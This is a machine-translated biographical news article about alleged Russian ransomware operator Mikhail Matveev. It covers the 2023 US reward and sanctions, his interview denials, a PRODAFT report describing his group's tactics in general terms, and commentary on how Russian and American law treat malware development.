Content |
Biography
2023
Announcement by the US State Department of a reward of $10 million for capture
On May 16, 2023, the US State Department announced a $10 million reward for information that would help capture Russian hacker Mikhail Matveyev.
According to American law enforcement agencies, Matveev conducted transnational criminal activities. He has already been formally charged with cyber fraud in the District of Columbia and the District of New Jersey. At the same time, the Office of Foreign Assets Control of the US Treasury Department imposed sanctions on Matveyev.
We are taking these measures in connection with Matveyev's participation in attacks aimed programs extortioners at law enforcement agencies, USA enterprises and critical infrastructure facilities around the world, the State Department said in a statement. |
US Treasury documents note that Matveev is one of the key figures in the development and distribution of ransomware such as Hive, LockBit and Babuk. In 2021, according to the department, the Babuk ransomware attacked the police department of a large American city. Cybercriminals stole home addresses, mobile phone numbers, financial details, medical histories and other personal data of police officers, as well as confidential information about criminal gangs, witnesses and persons suspected of committing atrocities.
In addition, law enforcement agencies associate Matveev with the introduction of ransomware in the network of a number of organizations, including the American airline. The Treasury also says the Hive ransomware team has attacked more than 1,500 victims in more than 80 countries, including hospitals, educational institutions, financial firms and critical infrastructure. Nothing is reported about Matveev's alleged whereabouts.[1]
Communication with journalists
In early October 2023, the most wanted Russian hacker Mikhail Matveev, also known as Wazawaka and Boriselcin, talked to reporters. He said that his life did not change too much after the United States added him to the sanctions list, and the FBI promised a reward of $10 million for information that would help in his capture.
According to Matveev, falling under American sanctions means that Russia will not deport him. Thus, we can conclude that the hacker, as of October 2023, lives on the territory of the Russian Federation. Matveev stressed that he would no longer travel, and so that there was no temptation, he literally "burned his passport." Wazawaka emphasizes that his last trip abroad took place in 2014, when he visited Thailand: there, among other things, he tried local dishes, in particular, scorpions, which "turned out to be delicious."
We Russians are not afraid of the American authorities. My life has changed for the better after the sanctions, I don't feel them on myself, in addition, this is a plus for my safety, "Matveev said in an interview with TechCrunch. |
According to US law enforcement, Matveyev was involved in a "global extortion campaign" and also worked closely with cyber groups Hive, Lockbit and Babuk to carry out "serious attacks" on corporations and critical infrastructure in the US and other countries, including hospitals and government agencies. Matveev himself, however, denies this, stating that in fact he is not connected with any cyberband engaged in extortion, and that he "rented their software only for his own purposes."
I have never been the author of the Hive and Lockbit projects, I was only an affiliated independent person - on my own, my own owner, - said Matveev, adding that he is no longer interested in ransomware.[2] |
Swiss researchers have studied and disclosed detailed information about the activities of the famous hacker from Russia
PRODAFT has published a report on the activities of a group of Russian hackers led by Mikhail Matveyev, who, according to it, are engaged in the development and operation of ransomware. The company's experts studied information about the activities of Matveev's group from April to December 2023, analyzing data on interception of messages between its participants. According to the company, in addition to the head, it also includes six more pentesters, which in the report are named only by network pseudonyms. This group allegedly was not only partners of such ransomware platforms as Conti, LockBit, Hive, Trigona and NoEscape, but also direct developers of the RaaS platforms Babuk and Monti together with Evgeny Bogachev.
Actually, Mikhail Matveev became known in May 2023, when the US Department of Justice issued a press release accusing him of attacking several police departments in the United States with LockBit and Babuk ransomware. As a result, a $10 million reward was announced for information about him, which PRODAFT may be planning to receive as a result of the publication of the report.
Attacks orchestrated by Matveyev and his team include using Zoominfo and services such as Censys, Shodan, and FOFA to gather victim information, relying on known vulnerabilities and initial access brokers to gain a foothold, in addition to using a combination of custom and off-the-shelf tools to match VPN accounts, elevate privileges, and optimize their operations.
After gaining initial access, Vasavak (alias Matveev) and his subordinates mainly use PowerShell commands to run the Remote Monitoring and Management Tool (RMM), the PRODAFT report explains. - A distinctive feature of the team is the operation of the MeshCentral tool, which is based on open source software, for various operations. |
Moreover, the source codes of the Babuk ransomware developed by the team were made public, and other cyber groups used them, among other things, to attack Russian critical information infrastructure facilities. In American law, the development of malware is still not punished - only their use is prohibited. This feature is abused by RaaS platforms in order to avoid legal prosecution, since they personally do not commit malicious actions. However, Russian law prohibits not only the use, but also the development of malicious programs. True, this requires affected organizations on the territory of Russia, which must submit an application for an investigation. That is why Russian groups are trying not to blackmail domestic companies.
In general, the exceptional extraterritoriality of the work of HPE developers is rather a myth, - explained the situation for TAdviser, Pavel Kuznetsov director of strategic alliances and interaction with state authorities of the GC Gardaí"." - Malware developers who sold their work to both attackers from the nearest abroad and domestic crime for further use often worked from the territory of the state, on the organization of which attacks were subsequently carried out using these tools. For example, it is enough to recall the story of the popular banking Trojans of the Dimnie family. According to many researchers, Trojan programs of this family were developed by a person or a group of people, if not living in Russia, then at least being Russian-speaking. |